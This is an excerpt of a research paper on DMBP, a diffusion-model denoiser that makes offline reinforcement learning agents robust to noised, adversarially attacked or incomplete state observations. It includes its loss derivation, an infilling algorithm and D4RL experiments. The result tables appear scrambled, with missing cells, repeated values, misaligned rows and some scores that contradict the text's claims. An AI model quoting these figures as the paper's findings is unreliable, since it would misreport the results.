Testing-time robust RL formulations can generally be divided into three categories (Xu et al., 2022). i) Uncertain observations: In online settings, Zhang et al. (2020) propose a state-adversarial Markov decision process (SA-MDP) framework, which is advanced by Zhang et al. (2021); Sun et al. (2021), who adopt neural networks to simulate worst-case observation attacks for the training of more robust policies. In offline settings, Yang et al. (2022) utilize the conservative smoothing method to make the agent take similar actions when the perturbations on state observation are relatively small. ii) Uncertain actions: Tessler et al. (2019) explore the training of robust policies against two types of action uncertainties, i.e., occasional and constant adversarial perturbations. Tan et al. (2020) utilize adversarial training on actions to enhance the robustness against action perturbations. iii) Uncertain transitions and rewards: The computation of optimal policies against uncertain environment parameters has been explored under the robust Markov Decision Process (MDP) (Xu & Mannor, 2006; Roy et al., 2017; Ho et al., 2018) and the distributionally robust MDP frameworks (Xu & Mannor, 2010; Yu & Xu, 2015). In online RL settings, Pinto et al. (2017) and Gleave et al. (2019) train the agent under adversarial model uncertainty through a two-player Markov game approach (Littman, 1994). For offline RL training, Panaganti et al. (2022) propose a dual reformulated robust Bellman operator to deal with uncertain transition probabilities. For models in the first two categories, the underlying environment dynamics are not altered by the perturbations, which is not the case for the robust approaches against model uncertainties developed in the third category. Our work belongs to the first category.

Diffusion models in offline RL. The diffusion model was originally proposed as an iterative denoising procedure for image generation in computer vision (Sohl-Dickstein et al., 2015; Ho et al., 2020). Recently, diffusion models have been adopted in decision-making for state-based tasks. Diffuser (Janner et al., 2022) and Decision Diffuser (Ajay et al., 2022) utilize the conditional diffusion model as a trajectory generator to facilitate the decision making of the agent. Wang et al.
(2022) propose the Diffusion-QL algorithm that adopts the diffusion model to regulate the policy not to be far away from the one used in the dataset, in a similar spirit to Fujimoto et al. (2019); Wu et al. (2019). Different from the aforementioned works, the proposed approach utilizes the diffusion model as a denoiser (against state observation perturbations) rather than a generator, for robust offline training of RL agents.

3 PRELIMINARIES

Offline RL. RL tasks are generally modeled as Markov decision processes (MDPs) of the form $M = (S, A, r, P, \gamma, d_0)$, where $S$ is the state space, $A$ is the action space, $r : S \times A \rightarrow \mathbb{R}$ represents the reward function, $P$ is the model dynamics, $\gamma \in [0, 1)$ is the discount factor, and $d_0 \in \Delta(S)$ is the distribution of the initial state $s_0$ (the set of probability distributions over $X$ is denoted as $\Delta(X)$). $P(s'|s, a) : S \times A \rightarrow \Delta(S)$ represents the transition function from state $s$ to $s'$ when taking action $a$. The state-action-reward transitions over a trajectory are recorded as $\tau := (s_t, a_t, r_t)_{t \geq 0}$. The goal of RL is to learn a policy $\pi_\phi$ that maximizes the expectation of the cumulative discounted reward $R(\tau) = \sum_{t=0}^{\infty} \gamma^t r(s_t, a_t)$, denoted by $\pi_\phi^* = \arg\max_\pi \mathbb{E}_{s_0 \sim d_0, a \sim \pi}[R(\tau)]$.

A commonly used iteration method for state-based tasks is the actor-critic framework, where the Q-value of a policy is defined as $Q_\pi(s_t, a_t) := \mathbb{E}_{a \sim \pi}[\sum_{i=t}^{\infty} \gamma^{(i-t)} r(s_i, a_i)]$ and is modeled using neural networks (recorded as $Q_\psi(s_t, a_t)$). To approach an optimal policy, the temporal difference (TD) method is adopted to update the critic Q-value by minimizing the TD loss: $\mathcal{L}_{TD}(\psi) := \mathbb{E}_{(s,a,r,s') \in D}[(r + \gamma \max_{a' \in A} Q_\psi(s', a') - Q_\psi(s, a))^2]$. The actor is updated by $\mathcal{L}_{actor}(\phi) := \mathbb{E}_{s \in D, a \sim \pi_\phi(s)}[-Q(s, a)]$, where the dataset $D$ records historical interactions between the agent and the environment, and is continuously updated in the alternate training of the actor and the critic.

In offline RL settings, the training is performed on a static dataset $D_\nu := \{(s, a, r, s')\}$, which is obtained from a behavior policy $\pi_\nu$, without any interaction with the environment. Direct adoption of the actor-critic approach may lead to a severe distributional shift between the trained policy \( \pi_\phi \) and the behavior policy \( \pi_\nu \) due to the over-estimation of the Q-value of actions unseen in the dataset. To mitigate this issue, policy regularization has been adopted to update the actor through the constrained policy loss (Wu et al., 2019; Kumar et al., 2019; Fujimoto et al., 2019; Fujimoto & Gu, 2021; Wang et al., 2022):
\[ L(\phi) := L_d(\phi) + \alpha_{actor} L_{actor}(\phi), \]
where \( L_d(\phi) \) is the behavior cloning loss representing the nominal distance between the trained policy and the behavior policy, and \( \alpha_{actor} \) is the coefficient for the Q-value term. Alternatively, conservative Q estimation updates the critic through minimizing the constrained Q-value loss (Kumar et al., 2020; An et al., 2021; Lyu et al., 2022; Yang et al., 2022):
\[ L(\psi) := L_q(\psi) + \alpha_{critic} L_{TD}(\psi), \]
where \( L_q(\psi) \) is the penalty on the Q-value for out-of-distribution actions, and \( \alpha_{critic} \) is the coefficient for the TD loss term.
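As a concrete reference point for these two templates, the sketch below gives hedged PyTorch versions of the regularized actor loss and the conservative critic loss. The network interfaces, the mean-squared behavior-cloning distance, the specific form of the conservative penalty, and the coefficient values are illustrative assumptions; in particular, the max over actions in the TD target is replaced by the policy's action, as is common in continuous control.

```python
import torch
import torch.nn.functional as F

def regularized_actor_loss(policy, critic, batch, alpha_actor=2.5):
    """Policy regularization: L(phi) = L_d(phi) + alpha_actor * L_actor(phi)."""
    s, a_data = batch["state"], batch["action"]
    a_pi = policy(s)                            # deterministic policy output
    l_d = F.mse_loss(a_pi, a_data)              # behavior cloning distance
    l_actor = -critic(s, a_pi).mean()           # maximize Q(s, pi(s))
    return l_d + alpha_actor * l_actor

def conservative_critic_loss(critic, target_critic, policy, batch,
                             gamma=0.99, alpha_critic=1.0):
    """Conservative Q estimation: L(psi) = L_q(psi) + alpha_critic * L_TD(psi)."""
    s, a, r, s2 = (batch[k] for k in ("state", "action", "reward", "next_state"))
    with torch.no_grad():                       # TD target without gradient flow
        target = r + gamma * target_critic(s2, policy(s2)).squeeze(-1)
    l_td = F.mse_loss(critic(s, a).squeeze(-1), target)
    # CQL-style penalty: push Q down on policy actions, up on dataset actions
    l_q = (critic(s, policy(s)) - critic(s, a)).mean()
    return l_q + alpha_critic * l_td
```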
**Diffusion model.** Diffusion-based generative models have been widely used for synthesizing high-quality images from text descriptions. The forward process, i.e., the noising process, is a Markov chain that gradually adds Gaussian noise to data according to a variance schedule \( \beta_1, \ldots, \beta_K \):
\[ q(x_{1:K} | x_0) := \prod_{k=1}^{K} q(x_k | x_{k-1}), \quad q(x_k | x_{k-1}) := \mathcal{N}(x_k; \sqrt{1 - \beta_k} x_{k-1}, \beta_k I). \]
The reverse process, i.e., the denoising process, is a Markov chain with learned Gaussian transitions that usually starts at \( p(x_K) = \mathcal{N}(x_K; 0, I) \):
\[ p_\theta(x_{0:K}) := p(x_K) \prod_{k=1}^{K} p_\theta(x_{k-1} | x_k), \quad p_\theta(x_{k-1} | x_k) := \mathcal{N}(x_{k-1}; \mu_\theta(x_k, k), \Sigma_\theta(x_k, k)). \]
Ho et al. (2020) derive a simplified surrogate loss for the reverse-process denoising:
\[ L_{denoise}(\theta) := \mathbb{E}_{k \sim [1,K], \epsilon \sim \mathcal{N}(0,I)}[\|\epsilon_\theta(x_k, k) - \epsilon\|^2]. \]
The Gaussian noise \( \epsilon \), which perturbs the original data \( x_0 \) to the noised data \( x_k \), is estimated through the neural-network-based predictor \( \epsilon_\theta(x_k, k) \). \( x_{k-1} \) is sampled from the reverse process as \( \mu_\theta(x_k, k) \) and \( \Sigma_\theta(x_k, k) \) are functions of \( \epsilon_\theta(x_k, k) \). It is straightforward to extend diffusion models to conditional ones with \( p_\theta(x_{k-1} | x_k, c) \) (conditioned on information \( c \)), where the noise prediction is given by \( \epsilon_\theta(x_k, k, c) \).

### 4 Diffusion Model Based Predictor

We express the perturbed version of the original state \( s \) as \( \tilde{s} \), where \( B_d(s, \epsilon) := \{\tilde{s} : d(s, \tilde{s}) \leq \epsilon\} \) is the perturbation set and the metric \( d(\cdot, \cdot) \) is based on the \( \ell_p \) norm, as in Shen et al. (2020). An adversarial attack on state \( s \) is introduced in Yang et al. (2022):
\[ \tilde{s}^* = \arg\max_{\tilde{s} \in B_d(s, \epsilon)} D(\pi_\phi(\cdot | s) \,\|\, \pi_\phi(\cdot | \tilde{s})), \]
where \( D(\cdot \| \cdot) \) is the divergence of two distributions. The targets of these works are to minimize the smoothness regularizer for the policy, \( R_s^P = \mathbb{E}_{s \sim D} \max_{\tilde{s} \in B_d(s, \epsilon)} D(\pi_\phi(\cdot | s) \,\|\, \pi_\phi(\cdot | \tilde{s})) \), and to minimize the smoothness regularizer for the value function, \( R_s^V = \mathbb{E}_{s \sim D, a \sim \pi} \max_{\tilde{s} \in B_d(s, \epsilon)} (Q(\tilde{s}, a) - Q(s, a)) \), against the perturbations on state observations. We remark that we do not normalize the state observations when applying the perturbations as in Shen et al. (2020); Sun et al. (2021), in contrast to Zhang et al. (2020); Yang et al. (2022).

In Section 4.1, we propose DMBP to recover the actual state for decision-making (which is fundamentally different from the technical approaches in the aforementioned works). In Section 4.2, we propose a new non-Markovian loss function to mitigate error accumulation. In Section 4.3, we apply DMBP to RL tasks under incomplete state observations with unobserved dimension(s).

#### 4.1 Conditional diffusion for predicting real state

As there are two timesteps involved in our framework, we use superscripts \( i, k \in \{1, \ldots, K\} \) to denote the diffusion timestep and subscript \( t \in \{1, \ldots, T\} \) to denote the trajectory timestep in RL tasks. DMBP is inspired by the diffusion model framework originally proposed for image generation (Ho et al., 2020).
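To ground the recap above, here is a minimal sketch of the simplified conditional training objective \(L_{denoise}\). The `eps_model` interface, the flat (batch, dim) data shape, and the 0-indexed timestep convention are assumptions for illustration.

```python
import torch

def ddpm_training_loss(eps_model, x0, cond, betas):
    """Simplified conditional DDPM loss: E || eps_theta(x_k, k, c) - eps ||^2.

    x0: (batch, dim) clean data; cond: conditioning information c;
    betas: (K,) variance schedule beta_1..beta_K (0-indexed here).
    """
    alpha_bars = torch.cumprod(1.0 - betas, dim=0)      # \bar{alpha}_k
    k = torch.randint(0, len(betas), (x0.shape[0],))    # k ~ uniform over steps
    a_bar = alpha_bars[k].unsqueeze(-1)                 # (batch, 1) for broadcasting
    eps = torch.randn_like(x0)
    # closed-form forward noising: x_k = sqrt(a_bar) * x0 + sqrt(1 - a_bar) * eps
    x_k = torch.sqrt(a_bar) * x0 + torch.sqrt(1.0 - a_bar) * eps
    return ((eps_model(x_k, k, cond) - eps) ** 2).mean()
```

In DMBP the condition \(c\) bundles the last action and the previously denoised state trajectory, and the timestep is drawn from the shortened schedule introduced next.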
As the proposed framework essentially deals with information with small to medium scale noises instead of generating data from pure noise, we redesign the variance schedule as:
\[ \beta_i = 1 - \alpha_i = e^{-(a \frac{i}{K} + b)} + c, \quad \bar{\alpha}_k = \prod_{i=1}^{k} \alpha_i, \quad \tilde{\beta}_i = \frac{1 - \bar{\alpha}_{i-1}}{1 - \bar{\alpha}_i} \beta_i, \] (1)
where \(a, b, c\) are hyperparameters (cf. Appendix B.2). The redesigned variance schedule restricts the noise scale to be small in the diffusion process and limits the total number of diffusion timesteps \(K\) for predictor training.

We use the conditional diffusion model to obtain the denoised state \(\hat{s}_t\) from the noised state \(\tilde{s}_t\), with the condition on the last step action \(a_{t-1}\) and the previously denoised state trajectory \(\tau_{t-1} := \{\hat{s}_1, \hat{s}_2, \ldots, \hat{s}_{t-1}\}\). The denoised state \(\hat{s}_t\) is sampled from the reverse denoising process, which can be expressed as a Markov chain:
\[ \hat{s}_t \sim p_\theta(\hat{s}_t^{0:k} \mid a_{t-1}, \tau_{t-1}) = f_k(\tilde{s}_t) \prod_{i=1}^{k} p_\theta(\hat{s}_t^{i-1} \mid \hat{s}_t^i, a_{t-1}, \tau_{t-1}), \] (2)
where the chain is initialized at the scaled noised observation, \(\hat{s}_t^k = f_k(\tilde{s}_t) = \sqrt{\bar{\alpha}_k}\, \tilde{s}_t\). The transitions \(p_\theta(\hat{s}_t^{i-1} \mid \hat{s}_t^i, a_{t-1}, \tau_{t-1})\) can be modeled using the Gaussian distribution \(\mathcal{N}(\hat{s}_t^{i-1}; \mu_\theta(\hat{s}_t^i, a_{t-1}, \tau_{t-1}, i), \Sigma_\theta(\hat{s}_t^i, a_{t-1}, \tau_{t-1}, i))\), with the following mean and variance (Ho et al., 2020):
\[ \mu_\theta(\hat{s}_t^i, a_{t-1}, \tau_{t-1}, i) = \frac{\sqrt{\alpha_i}\,(1 - \bar{\alpha}_{i-1})}{1 - \bar{\alpha}_i}\, \hat{s}_t^i + \frac{\sqrt{\bar{\alpha}_{i-1}}\, \beta_i}{1 - \bar{\alpha}_i}\, \hat{s}_t^{0(i)}, \quad \Sigma_\theta(\hat{s}_t^i, a_{t-1}, \tau_{t-1}, i) = \tilde{\beta}_i I. \]
Here, \(\hat{s}_t^{0(i)}\) is the state directly recovered from the current diffusion step noise prediction, which is given by
\[ \hat{s}_t^{0(i)} = \frac{1}{\sqrt{\bar{\alpha}_i}} \big[\hat{s}_t^i - \sqrt{1 - \bar{\alpha}_i}\, \epsilon_\theta(\hat{s}_t^i, a_{t-1}, \tau_{t-1}, i)\big]. \] (3)
The reverse diffusion chain is given by
\[ \hat{s}_t^{i-1} = \frac{1}{\sqrt{\alpha_i}}\, \hat{s}_t^i - \frac{\beta_i}{\sqrt{\alpha_i (1 - \bar{\alpha}_i)}}\, \epsilon_\theta(\hat{s}_t^i, a_{t-1}, \tau_{t-1}, i) + \sqrt{\tilde{\beta}_i}\, \epsilon, \] (4)
where \(\epsilon \sim \mathcal{N}(0, I)\) and is set to 0 at the final denoising step \((i = 1)\). We refer to the final-step output of Eq. 4, \(\hat{s}_t^0\) (i.e., the output of DMBP), as \(\hat{s}_t\). \(\hat{s}_t\) can be used for decision-making by any offline-trained agent according to \(a_t = \pi_\phi(\cdot \mid \hat{s}_t)\). \(\hat{s}_t\) is stored in the trajectory cache \(\tau_t\), and the pair \((\tau_t, a_t)\) will be utilized for the next step of denoising. In practice, on account of the stochasticity involved in the diffusion process, we denoise the state 50 times in parallel and take the average value as the final output \(\hat{s}_t\) to prevent the denoised state from falling out of the distribution.

We find that directly inputting state trajectories and the action into neural networks leads to poor noise estimation (cf. Appendix C for an ablation study on the network structure), partially due to the fact that \(\hat{s}_{t-1}\) is more closely related to \(\hat{s}_t\) than \(\hat{s}_j\) with \(j < t - 1\), and that this information cannot be well captured by generic neural networks.
Therefore, we first extract the information from the trajectory with a U-net (Ronneberger et al., 2015; Janner et al., 2022) (recorded as \(U_\xi(\hat{s}_t^i, \tau_{t-1})\)), and then utilize an MLP-based neural network to predict the noise through \(\epsilon_\theta(U_\xi(\hat{s}_t^i, \tau_{t-1}), \hat{s}_t^i, a_{t-1}, \hat{s}_{t-1}, i)\), which is represented by \(\epsilon_\theta(\hat{s}_t^i, a_{t-1}, \tau_{t-1}, i)\) for notational convenience. See Appendix B.1 for details.

### 4.2 Non-Markovian Loss Function

The accuracy of the current denoising result \(\hat{s}_t\) is highly dependent on the accuracy of the diffusion condition \(\tau_{t-1}\). A straightforward adoption of the loss function \(L_{denoise}\) from the denoising diffusion probabilistic model (DDPM) (Ho et al., 2020) may lead to severe error accumulation in online testing, due to the mismatch between the condition available at training time (ground-truth state trajectories from the dataset) and the condition available at test time (previously denoised state trajectories). To mitigate error accumulation and enhance the robustness of DMBP, we propose a non-Markovian training objective that minimizes the sum entropy of denoised states over the RL trajectory \(\tau\):
\[ L_{\text{entropy}} = \sum_{t=2}^{T} \mathbb{E}_{s_t \in \tau} \left[ -\log P(\hat{s}_t \mid a_{t-1}, \tau_{t-1}) \right], \] (5)
where \(P(\hat{s}_t \mid a_{t-1}, \tau_{t-1}) = p_\theta(\hat{s}_t^{0} \mid a_{t-1}, \tau_{t-1})\) is the distribution of the state after denoising at RL timestep \(t\). Following the setting in Ho et al. (2020), we establish a closed-form expression of the training objective that minimizes Eq. 5, which can be simplified as (cf. the details in Appendix A):
\[ L_{\text{simple}}(\theta) = \mathbb{E}_{s_1 \sim d_0,\; \epsilon_t^i \sim \mathcal{N}(0, I),\; i \sim U_K} \left[ \sum_{t=2}^{T} \| \epsilon_\theta(\tilde{s}_t^i, a_{t-1}, \tau_{t-1}, i) - \epsilon_t^i \|_2^2 \right], \] (6)
where \( U_K \) is the uniform distribution over the discrete set \( \{1, 2, \ldots, K\} \), and the noised states for all terms are sampled through
\[ \tilde{s}_t^i = \sqrt{\bar{\alpha}_i}\, s_t + \sqrt{1 - \bar{\alpha}_i}\, \epsilon_t^i, \quad \epsilon_t^i \sim \mathcal{N}(0, I). \]
For computational convenience, we further simplify Eq. 6 and derive our non-Markovian loss function by sampling the partial trajectory \((s_{t-N}, a_{t-N}, s_{t-N+1}, \ldots, s_{t+M-1})\) from the offline dataset \( D_\nu \) (\( N \) is the condition trajectory length and \( M \) is the sample trajectory length):
\[ L(\theta) = \mathbb{E}_{i \sim U_K,\; \epsilon \sim \mathcal{N}(0, I),\; (s_{t-N}, \ldots, s_{t+M-1}) \in D_\nu} \Big[ \| \epsilon_\theta(\tilde{s}_t^i, a_{t-1}, \tau_{t-1}^i, i) - \epsilon_t^i \|^2 + \sum_{m=t+1}^{t+M-1} \| \epsilon_\theta(\tilde{s}_m^i, a_{m-1}, \tau_{m-1}^i, i) - \epsilon_m^i \|^2 \Big], \]
where the state trajectory condition for the predictor \( \epsilon_\theta \) in the first term is the original \( \tau_{t-1}^i = \{s_{t-N}, \ldots, s_{t-1}\} \) from the offline dataset \( D_\nu \), and the state trajectory condition in the summed terms can be expressed as \( \tau_{m-1}^i = \{\tilde{s}_j \mid j \in \{m-N, \ldots, m-1\}\} \), with
\[ \tilde{s}_j = \begin{cases} s_j & \text{if } j < t, \\ \frac{1}{\sqrt{\bar{\alpha}_i}} \big[\tilde{s}_j^i - \sqrt{1 - \bar{\alpha}_i}\, \epsilon_\theta(\tilde{s}_j^i, a_{j-1}, \tau_{j-1}^i, i)\big] & \text{otherwise } (j \in \{t, \ldots, t+M-2\}). \end{cases} \]
Different from the loss function in Ho et al.
Different from the loss function in Ho et al. (2020), which concerns only single-step diffusion accuracy (for data generation conditioned on ground-truth states), the proposed non-Markovian loss function trades off between the diffusion accuracy at the current RL timestep and the condition shift over a long RL time horizon (to avoid error accumulation).

### 4.3 Diffusion based state infilling for unobserved dimensions

Inspired by the application of diffusion models in image inpainting (Lugmayr et al., 2022), we propose a state infilling procedure for DMBP-facilitated decision making, which is shown to work well on state-based RL tasks with incomplete state observations (cf. Section 5.2). We denote the ground-truth state as \( s_t \), the unobserved state information as \((1-m) \odot s_t \), and the observed state information as \( \bar{s}_t = m \odot s_t \), which is incomplete with some masked dimensions. Given the recovered state trajectory \( \hat{\tau}_{t-1} \), the agent-generated action \( a_{t-1} \), and the known information of the current state \( \bar{s}_t \), DMBP aims to recover the original state \( s_t \) for decision making. Following the inpainting method of Lugmayr et al. (2022), DMBP infills the missing state information through Algorithm 1. For each diffusion timestep, the known region of the state is determined from the forward process (noising process) in line 4, and the unknown region of the state is determined from the reverse process (denoising process) in line 7. To avoid disharmony between the forward- and reverse-process generated information, the combined information (in line 8) takes one forward diffusion step in line 10, which is called "resampling". The resampling is performed \( U \) times per diffusion timestep. More resampling steps may lead to more accurate and harmonious diffusion information, at the cost of a higher computational load.

### Algorithm 1 Diffusion based state infilling for DMBP

**Require:** \( \hat{s}_t^K \sim \mathcal{N}(0, I) \), \( \bar{s}_t, a_{t-1}, \hat{\tau}_{t-1}, m \)
1: for \( i = K, \ldots, 1 \) do
2: for \( u = 1, \ldots, U \) do
3: \( \epsilon \sim \mathcal{N}(0, I) \) if \( i > 1 \), else \( \epsilon = 0 \)
4: \( \hat{s}_{t, \text{known}}^{i-1} = \sqrt{\bar{\alpha}_{i-1}}\, \bar{s}_t + \sqrt{1 - \bar{\alpha}_{i-1}}\, \epsilon \)
5: \( z \sim \mathcal{N}(0, I) \) if \( i > 1 \), else \( z = 0 \)
6: \( \epsilon_{\text{pred}} = \epsilon_\theta(\hat{s}_t^i, a_{t-1}, \hat{\tau}_{t-1}, i) \)
7: \( \hat{s}_{t, \text{unknown}}^{i-1} = \frac{1}{\sqrt{\alpha_i}}\, \hat{s}_t^i - \frac{\beta_i}{\sqrt{\alpha_i(1-\bar{\alpha}_i)}}\, \epsilon_{\text{pred}} + \sqrt{\tilde{\beta}_i}\, z \)
8: \( \hat{s}_t^{i-1} = m \odot \hat{s}_{t, \text{known}}^{i-1} + (1-m) \odot \hat{s}_{t, \text{unknown}}^{i-1} \)
9: if \( u < U \) and \( i > 1 \) then
10: \( \hat{s}_t^i \sim \mathcal{N}(\sqrt{1-\beta_i}\, \hat{s}_t^{i-1}, \beta_i I) \)
11: end if
12: end for
13: end for
14: return \( \hat{s}_t = \hat{s}_t^0 \)
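A minimal NumPy sketch of Algorithm 1 follows; again this is illustrative rather than the released code, with `eps_theta` and `schedule` as in the Sec. 4.1 sketch.

```python
import numpy as np

def infill_state(s_obs, m, eps_theta, a_prev, traj, K, U, schedule):
    """Algorithm 1 sketch: RePaint-style infilling of masked state dims.
    m is 1 on observed dimensions and 0 on unobserved ones."""
    beta, alpha, alpha_bar = schedule
    s = np.random.randn(*s_obs.shape)                   # s_t^K ~ N(0, I)
    for i in range(K, 0, -1):
        for u in range(1, U + 1):
            ab_prev = alpha_bar[i - 2] if i > 1 else 1.0
            ab_i = alpha_bar[i - 1]
            eps = np.random.randn(*s.shape) if i > 1 else 0.0
            # line 4: known region from one forward (noising) step
            s_known = np.sqrt(ab_prev) * s_obs + np.sqrt(1.0 - ab_prev) * eps
            z = np.random.randn(*s.shape) if i > 1 else 0.0
            eps_pred = eps_theta(s, a_prev, traj, i)
            # line 7: unknown region from one reverse (denoising) step
            bt = (1.0 - ab_prev) / (1.0 - ab_i) * beta[i - 1]
            s_unknown = (s - beta[i - 1] / np.sqrt(1.0 - ab_i) * eps_pred) \
                        / np.sqrt(alpha[i - 1]) + np.sqrt(bt) * z
            # line 8: combine both regions
            s = m * s_known + (1.0 - m) * s_unknown
            if u < U and i > 1:
                # line 10: resample one forward step before retrying
                s = np.sqrt(1.0 - beta[i - 1]) * s \
                    + np.sqrt(beta[i - 1]) * np.random.randn(*s.shape)
    return s
```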
### 5 Experiments

We evaluate the proposed DMBP together with several state-of-the-art baseline offline RL algorithms on the D4RL Gym benchmark (Fu et al., 2020) against different types of attacks on state observations. The baseline algorithms include Batch-Constrained deep Q-learning (BCQ) (Fujimoto et al., 2019), Conservative Q-Learning (CQL) (Kumar et al., 2020), TD3 with Behavior Cloning (TD3+BC) (Fujimoto & Gu, 2021), Diffusion Q-Learning (Diffusion QL) (Wang et al., 2022), and Robust Offline Reinforcement Learning (RORL) (Yang et al., 2022). We train DMBP for 300 epochs (1000 gradient steps with a batch size of 256 per epoch) with the hyperparameters defined in Appendix B.2. We train the baseline algorithms with their suggested hyperparameters for each environment and dataset. We perform two tests: robustness against noised state observations (Section 5.1), and robustness against incomplete state observations with unobserved dimension(s) (Section 5.2). We utilize the same DMBP for all baseline algorithms (cf. the framework in Figure 1), and benchmark their performance against the original baseline algorithms (without DMBP). We present partial results on the D4RL Mujoco benchmark; the results on other datasets (including medium-expert, medium, and full-replay) and other benchmarks (including Adroit and Franka Kitchen) can be found in Appendix D.

### 5.1 ROBUSTNESS AGAINST NOISED STATE OBSERVATIONS

Firstly, we evaluate the performance of DMBP in a basic setting with Gaussian noises of standard deviation $\kappa$: $\tilde{s}_t = s_t + \kappa \cdot \mathcal{N}(0, I)$. The evaluation results in Table 1 indicate that DMBP can significantly enhance the robustness of all baseline algorithms, especially on the "medium-replay" datasets, where the DMBP-strengthened baseline algorithms achieve scores similar to those in the corresponding noise-free cases. To demonstrate the powerful denoising effect of DMBP, we visualize a partial trajectory of "hopper" during the test in Figure 2.

#### Table 1: D4RL score of the baseline algorithms ("base", recorded in black) and the DMBP strengthened ones ("DMBP", recorded in blue) trained with expert (e) and medium-replay (m-r) datasets under different scales of Gaussian random noises on state observation. The evaluation results are averaged over 5 random checkpoints (20 tests for each checkpoint).

| Env Dataset | Noise scale | BCQ base | DMBP | CQL base | DMBP | TD3+BC base | DMBP | Diffusion QL base | DMBP | RORL base | DMBP |
|-------------|-------------|----------|------|----------|------|-------------|------|------------------|------|-----------|------|
| HalfCheetah e | 0.05 | 4.5±2.6 | 6.0±2.3 | 9.1±8.6 | 18.1±8.6 | 60.9±22.5 | 7.3±6.6 | 77.1±15.3 | 4.8±3.6 | 75.2±20.7 | 15.4±3.9 |
| m-r | 0.10 | 4.5±2.2 | 26.8±16.2 | 7.4±4.0 | 40.5±16.6 | 4.7±3.6 | 47.5±22.2 | 3.3±2.5 | 39.8±21.8 | 3.7±1.9 | 32.8±20.4 |
| Hopper e | 0.05 | 41.6±17.4 | 38.5±11.2 | 35.6±1.3 | 45.8±1.0 | 28.1±8.4 | 44.3±1.0 | 30.1±4.4 | 45.6±0.9 | 45.3±2.2 | 61.9±1.2 |
| m-r | 0.10 | 20.6±16.9 | 28.5±11.2 | 25.8±1.3 | 44.6±1.1 | 24.1±8.9 | 42.5±2.6 | 24.2±1.6 | 44.6±3.0 | 30.1±4.9 | 58.4±1.2 |
| Walker2d e | 0.05 | 111.6±0.6 | 108.8±1.9 | - | 110.7±0.5 | - | 109.6±0.5 | - | 104.8±12.5 | - |
| m-r | 0.10 | 77.9±37.6 | 110.3±2.0 | 97.6±21.9 | 94.3±20.3 | 72.9±39.4 | 109.2±1.5 | 93.3±27.2 | 109.1±4.0 | 95.4±19.7 | 97.8±20.2 |
| 0.15 | 28.2±32.4 | 104.2±13.5 | 78.9±33.2 | 83.4±23.3 | 9.2±13.6 | 107.5±5.2 | 30.5±32.5 | 94.5±18.1 | 81.6±26.4 | 84.5±26.4 |

Figure 2: Visualization of the denoising effect of DMBP with Diffusion QL (trained on the dataset of hopper-medium-replay-v2). The observation is perturbed with Gaussian-distributed random noise with std of 0.10.

Table 2: D4RL score of the baseline algorithms and the DMBP strengthened ones under uniformly distributed random noise (U-rand), maximum action-difference attack (MAD), and minimum Q-value attack (MinQ) on state observations.
| Env | Dataset/Noise scale | Type | BCQ base | DMBP | CQL base | DMBP | TD3+BC base | DMBP | Diffusion QL base | DMBP | RORL base | DMBP |
|--------------|---------------------|------|----------|------|----------|------|-------------|------|------------------|------|----------|------|
| HalfCheetah | e | U-rand | 7.4±4.9 | 69.1±27.5 | 27.2±6.4 | 69.6±22.4 | 16.3±13.1 | 84.2±17.1 | 11.6±10.9 | 77.8±21.8 | 24.3±7.5 | 66.8±27.0 |
| | | MAD | 3.6±1.7 | 52.5±17.9 | 12.4±6.9 | 61.2±19.7 | 4.7±3.3 | 65.4±16.0 | 4.3±3.2 | 62.9±13.2 | 14.1±2.5 | 54.3±27.1 |
| | | MinQ | 12.8±9.3 | 51.8±33.9 | 19.4±11.3 | 60.4±19.4 | 18.0±4.2 | 88.2±11.3 | 8.0±6.7 | 71.1±15.2 | 9.3±8.0 | 71.0±29.1 |
| | 0.05 | U-rand | 34.1±10.8 | 70.6±25.3 | 27.1±6.8 | 39.0±6.6 | 46.7±1.8 | 38.8±25.7 | 34.2±10.3 | 62.2±11.1 | 34.2±11.1 | 62.2±11.1 |
| | | MAD | 19.2±8.2 | 29.4±6.9 | 39.0±2.6 | 46.5±1.8 | 27.1±3.4 | 36.2±0.9 | 33.4±2.8 | 34.5±5.5 | 22.5±1.5 | 23.2±1.0 |
| | | MinQ | 5.1±5.2 | 36.7±8.8 | 39.2±0.8 | 46.2±1.1 | 36.7±6.8 | 44.8±1.1 | 37.0±4.8 | 38.6±1.1 | 34.0±1.4 | 63.7±2.3 |
| | 0.10 | U-rand | 46.1±20.7 | 66.9±26.3 | 59.6±29.4 | 49.5±23.8 | 27.6±28.3 | 84.0±27.4 | 53.2±20.8 | 84.4±25.3 | 85.3±37.0 | 81.9±25.3 |
| | | MAD | 31.1±14.4 | 53.2±24.2 | 22.6±13.9 | 73.9±27.9 | 27.2±10.9 | 60.3±27.2 | 36.8±9.0 | 37.1±12.3 | 36.6±22.2 | 59.0±13.8 |
| | | MinQ | 47.4±18.9 | 62.5±27.9 | 32.7±13.5 | 58.7±17.9 | 45.3±27.5 | 95.7±27.6 | 66.7±33.6 | 59.2±23.9 | 79.8±32.7 | 59.4±22.5 |
| Hopper | e | U-rand | 18.5±8.2 | 68.9±19.2 | 66.3±20.1 | 95.9±8.8 | 20.6±9.1 | 65.4±22.0 | 33.9±10.7 | 94.9±17.7 | 80.7±28.0 | 103.5±1.3 |
| | | MAD | 5.1±5.0 | 37.5±26.1 | 32.1±15.9 | 88.9±13.7 | 6.1±5.5 | 64.3±21.8 | 9.9±8.1 | 38.3±15.8 | 51.6±30.7 | 97.5±2.5 |
| | | MinQ | 5.3±5.4 | 18.3±18.4 | 84.6±14.1 | 87.5±6.6 | 11.8±7.6 | 80.5±18.1 | 51.2±25.1 | 62.5±27.3 | 98.3±6.2 | 103.2±2.4 |
| | 0.05 | U-rand | 102.1±11.8 | 110.4±10.8 | 106.1±9.9 | 106.0±7.4 | 106.1±2.9 | 110.3±10.5 | 107.2±1.0 | 109.4±10.5 | 95.1±15.7 | 97.7±9.5 |
| | | MAD | 50.5±4.37 | 70.5±13.3 | 64.1±27.0 | 97.6±16.1 | 19.9±22.7 | 69.7±17.5 | 36.6±35.5 | 88.2±24.8 | 61.9±29.2 | 83.8±19.9 |
| | | MinQ | 99.9±22.2 | 105.6±11 | 99.9±11.8 | 102.4±6.9 | 91.9±22.4 | 105.5±1.3 | 101.1±2.0 | 102.4±1.3 | 91.8±28.0 | 89.3±13.5 |
| | 0.10 | U-rand | 17.3±12.7 | 54.9±39.5 | 69.2±20.9 | 78.1±9.2 | 57.2±24.3 | 83.6±14.8 | 64.2±27.8 | 91.7±12.1 | 89.9±11.7 | 88.7±2.1 |
